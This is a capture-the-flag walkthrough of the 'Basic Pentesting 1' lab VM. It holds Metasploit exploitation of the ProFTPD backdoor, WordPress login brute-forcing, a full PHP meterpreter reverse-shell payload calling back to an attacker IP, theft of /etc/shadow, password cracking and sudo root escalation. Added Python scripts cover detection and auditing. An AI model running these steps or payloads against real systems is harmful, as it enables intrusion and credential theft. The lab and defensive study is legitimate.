Basic Pentesting 1 Walkthrough

[email protected]:~# nmap -sV -A -v 192.168.1.25

Nmap scan report for 192.168.1.25
Host is up (0.00071s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
|   256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_  256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:9E:1F:89 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 12.168 days (since Thu Oct 17 09:49:47 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.71 ms 192.168.1.25
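The scan above is useful to a defender as well: the banner versions it reports can be checked against a list of versions known to be affected. The script below is an added example (not part of the original walkthrough) that parses the open-port lines from the nmap output and flags a service when its banner version falls inside an affected range. The AFFECTED table is taken only from the Metasploit search results shown on this page, the version parser handles the ProFTPD numbering scheme (1.3.2rc3, 1.3.3b, 1.3.3c) and ignores versions it cannot parse, and SAMPLE_NMAP is the page's own port lines, embedded here as constructed input.

```python
"""Flag services in `nmap -sV` output whose banner version is in a known-affected range.
Added example, not from the original walkthrough. AFFECTED is built only from the
Metasploit search output shown on the page."""
import re
from typing import List, Optional, Tuple

# Constructed sample: the open-port lines from the page's nmap scan.
SAMPLE_NMAP = """\
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
"""

# (product, lowest affected, highest affected, note), as listed in the msf search
# results on the page; an exact version is written as low == high.
AFFECTED = [
    ("ProFTPD", "1.3.2rc3", "1.3.3b", "Telnet IAC buffer overflow"),
    ("ProFTPD", "1.3.3c", "1.3.3c", "backdoored 1.3.3c release"),
    ("ProFTPD", "1.3.5", "1.3.5", "mod_copy command execution"),
]

PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+(.*)$")
VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)([a-z])?(?:rc(\d+))?$")


def version_key(v: str) -> Optional[tuple]:
    """Sortable key for ProFTPD-style versions: 1.3.2rc3 < 1.3.2 < 1.3.3b < 1.3.3c.
    Returns None for version strings in another scheme (e.g. OpenSSH's 7.2p2)."""
    m = VERSION.match(v)
    if not m:
        return None
    major, minor, patch, letter, rc = m.groups()
    # A release candidate sorts before the final release with the same number.
    return (int(major), int(minor), int(patch), 0 if rc else 1, int(rc or 0), letter or "")


def split_banner(banner: str) -> Tuple[str, Optional[str]]:
    """Product name is every token before the first token that starts with a digit."""
    tokens = banner.split()
    for i, tok in enumerate(tokens):
        if tok[0].isdigit():
            return " ".join(tokens[:i]), tok
    return banner, None


def audit(nmap_text: str) -> List[Tuple[int, str, str, str]]:
    """Return (port, product, version, note) for every banner inside an affected range."""
    findings = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, _service, banner = m.groups()
        product, version = split_banner(banner)
        key = version_key(version) if version else None
        if key is None:
            continue
        for prod, low, high, note in AFFECTED:
            if prod == product and version_key(low) <= key <= version_key(high):
                findings.append((int(port), product, version, note))
    return findings


if __name__ == "__main__":
    for port, product, version, note in audit(SAMPLE_NMAP):
        print(f"port {port}: {product} {version} -> {note}")
```

Banner matching is only a first pass: distributions backport fixes without bumping the version string, so a hit from this check should be confirmed against the package's changelog rather than treated as proof of exposure.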

Exploit search for ProFTPD

msf5 > search proftpd

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/freebsd/ftp/proftp_telnet_iac         2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   1  exploit/linux/ftp/proftp_sreplace             2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   2  exploit/linux/ftp/proftp_telnet_iac           2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   3  exploit/linux/misc/netsupport_manager_agent   2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow
   4  exploit/unix/ftp/proftpd_133c_backdoor        2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution
   5  exploit/unix/ftp/proftpd_modcopy_exec         2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution

msf5 > use exploit/unix/ftp/proftpd_133c_backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.1.25
rhosts => 192.168.1.25
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[email protected]:~/basic1# unshadow passwd shadow > merged
[email protected]:~/basic1# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-10-29 15:39) 14.28g/s 71.42p/s 71.42c/s 71.42C/s marlinspike..marli
Use the "--show" option to display all of the cracked passwords reliably
Session completed

WordPress Vulnerability
msf5 > use auxiliary/scanner/http/wordpress_login_enum
msf5 auxiliary(scanner/http/wordpress_login_enum) > set username admin
username => admin
msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt
pass_file => /usr/share/wordlists/dirb/common.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /secret/
targeturi => /secret/
msf5 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.1.30
rhosts => 192.168.1.30
msf5 auxiliary(scanner/http/wordpress_login_enum) > exploit
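A password-guessing run like the one above leaves an obvious trace in the web server's access log: a burst of POST requests to wp-login.php from one source. The script below is an added example (not part of the original walkthrough) showing the detection side: it reads Apache combined-format log lines, keeps a sliding 60-second window of failed login POSTs per source IP, raises an alert when the count reaches a threshold, and notes whether a successful login followed the burst. It assumes WordPress's usual behaviour of answering a failed login with 200 and a successful one with a 302 redirect; the log lines are constructed sample data, not a capture from this VM.

```python
"""Detect WordPress login brute-forcing in Apache access logs.
Added example, not from the original walkthrough. Assumes the combined log format
and that a failed wp-login.php POST returns 200 while a successful one returns 302."""
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def _line(ip: str, ts: datetime, method: str, path: str, status: int) -> str:
    """Build one combined-format log line (used only to construct sample input)."""
    return f'{ip} - - [{ts:{TS_FORMAT}}] "{method} {path} HTTP/1.1" {status} 1234'


# Constructed sample log: one host hammers /secret/wp-login.php twelve times in twelve
# seconds and then gets a 302 (login succeeded); another host browses normally.
_T0 = datetime(2019, 10, 30, 16, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = [
    _line("192.168.1.26", _T0 + timedelta(seconds=i), "POST", "/secret/wp-login.php", 200)
    for i in range(12)
]
SAMPLE_LOG.append(_line("192.168.1.26", _T0 + timedelta(seconds=12), "POST", "/secret/wp-login.php", 302))
SAMPLE_LOG.append(_line("192.168.1.40", _T0 + timedelta(seconds=5), "GET", "/secret/", 200))
SAMPLE_LOG.append(_line("192.168.1.40", _T0 + timedelta(seconds=30), "POST", "/secret/wp-login.php", 200))


def detect_bruteforce(lines: Iterable[str], threshold: int = 10,
                      window: timedelta = timedelta(seconds=60)) -> Dict[str, dict]:
    """Return {ip: alert} for sources with >= threshold failed logins inside `window`.
    The alert records the total failed attempts seen and whether a 302 followed."""
    recent: Dict[str, deque] = defaultdict(deque)   # timestamps inside the window
    failed_total: Counter = Counter()
    alerts: Dict[str, dict] = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["method"] != "POST" or not m["path"].endswith("/wp-login.php"):
            continue
        ip, status = m["ip"], int(m["status"])
        ts = datetime.strptime(m["ts"], TS_FORMAT)
        if status == 302:
            # A redirect after an alerted burst is the signal that a guess worked.
            if ip in alerts:
                alerts[ip]["success_after_burst"] = True
            continue
        failed_total[ip] += 1
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(ip, {"first_seen": q[0], "success_after_burst": False})
            a["failed_attempts"] = failed_total[ip]
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, alert)
```

Because the 302 on success is reported separately, an alert with `success_after_burst` set should be triaged as a probable account compromise rather than as noise; for the password-guessing itself, rate limiting on wp-login.php and multi-factor authentication are the mitigations.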


[email protected]:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.26 lport=6565 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1113 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.1.26'; $port = 6565; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

msf5 auxiliary(scanner/http/wordpress_login_enum) > use multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.26
lhost => 192.168.1.26
msf5 exploit(multi/handler) > set lport 6565
lport => 6565
msf5 exploit(multi/handler) > run

meterpreter > download /etc/shadow
[*] Downloading: /etc/shadow -> shadow
[*] Downloaded 1.27 KiB of 1.27 KiB (100.0%): /etc/shadow -> shadow
[*] download   : /etc/shadow -> shadow
meterpreter > download /etc/passwd
[*] Downloading: /etc/passwd -> passwd
[*] Downloaded 2.31 KiB of 2.31 KiB (100.0%): /etc/passwd -> passwd
[*] download   : /etc/passwd -> passwd
meterpreter >

[email protected]:~# unshadow passwd shadow > merged
[email protected]:~# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
No password hashes left to crack (see FAQ)
[email protected]:~# cd ~/.john
[email protected]:~/.john# rm john.pot
[email protected]:~/.john# cd -
/root
[email protected]:~# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-10-30 16:13) 2.040g/s 10.20p/s 10.20c/s 10.20C/s marlinspike..marli
Use the "--show" option to display all of the cracked passwords reliably
Session completed
[email protected]:~#

python -c 'import pty; pty.spawn("/bin/sh")' (http://netsec.ws/?p=337)

Another Method


msf5 exploit(multi/handler) > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password admin
password => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /secret
targeturi => /secret
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.1.30
RHOSTS => 192.168.1.30
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit

meterpreter > shell
Process 558 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
python -c 'import pty; pty.spawn("/bin/sh")'
sh: 0: getcwd() failed: No such file or directory
$ su - marlinspike
su - marlinspike
Password: marlinspike
[email protected]:~$ sudo bash
sudo bash
[sudo] password for marlinspike: marlinspike
[email protected]:~# whoami
whoami
root
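The jump from the web-server account to root above works only because the low-privilege user can run `sudo bash`, i.e. holds an unrestricted sudo grant. The script below is an added example (not part of the original walkthrough) of the least-privilege check a defender would run over /etc/sudoers: it parses user and group specifications, ignores comments and Defaults lines, and reports every non-root principal allowed to run ALL commands, marking those that can do so without a password. SAMPLE_SUDOERS is a constructed file for illustration, not the VM's actual sudoers; the marlinspike and %sudo entries in it are assumptions made to mirror what the session above implies.

```python
"""Report sudoers rules that grant unrestricted command execution.
Added example, not from the original walkthrough; SAMPLE_SUDOERS is constructed."""
import re
from typing import Dict, List

# Constructed sample sudoers content (assumed, not the VM's real file).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
marlinspike     ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
deploy          ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
backup          ALL=(root) NOPASSWD: ALL
"""

# user_or_group  hosts=(runas) [TAG:] command[, command...]
RULE = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAGS = re.compile(r"(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):")


def audit_sudoers(text: str) -> List[Dict[str, object]]:
    """Return one finding per non-root principal whose command list contains ALL."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        cmds = m["cmds"]
        # Strip tags such as NOPASSWD: before splitting the command list.
        cmd_list = [c.strip() for c in TAGS.sub("", cmds).split(",")]
        if "ALL" not in cmd_list or m["who"] == "root":
            continue
        findings.append({
            "who": m["who"],
            "runas": m["runas"] or "root",
            "nopasswd": "NOPASSWD:" in cmds,
        })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        flag = " (no password required)" if f["nopasswd"] else ""
        print(f"{f['who']} may run ALL as {f['runas']}{flag}")
```

A rule that names specific commands, like the constructed `deploy` entry, is not reported even with NOPASSWD, since it bounds what the account can do; the fix for the flagged entries is to replace `ALL` with the exact commands the account needs. Files included via `#include` / `#includedir` (typically /etc/sudoers.d) would need to be fed through the same function.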

SSH Walkthrough

[email protected]:~# ssh [email protected]
The authenticity of host '192.168.1.25 (192.168.1.25)' can't be established.
ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.25' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

593 packages can be updated.
420 updates are security updates.

New release '18.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

[email protected]:~$
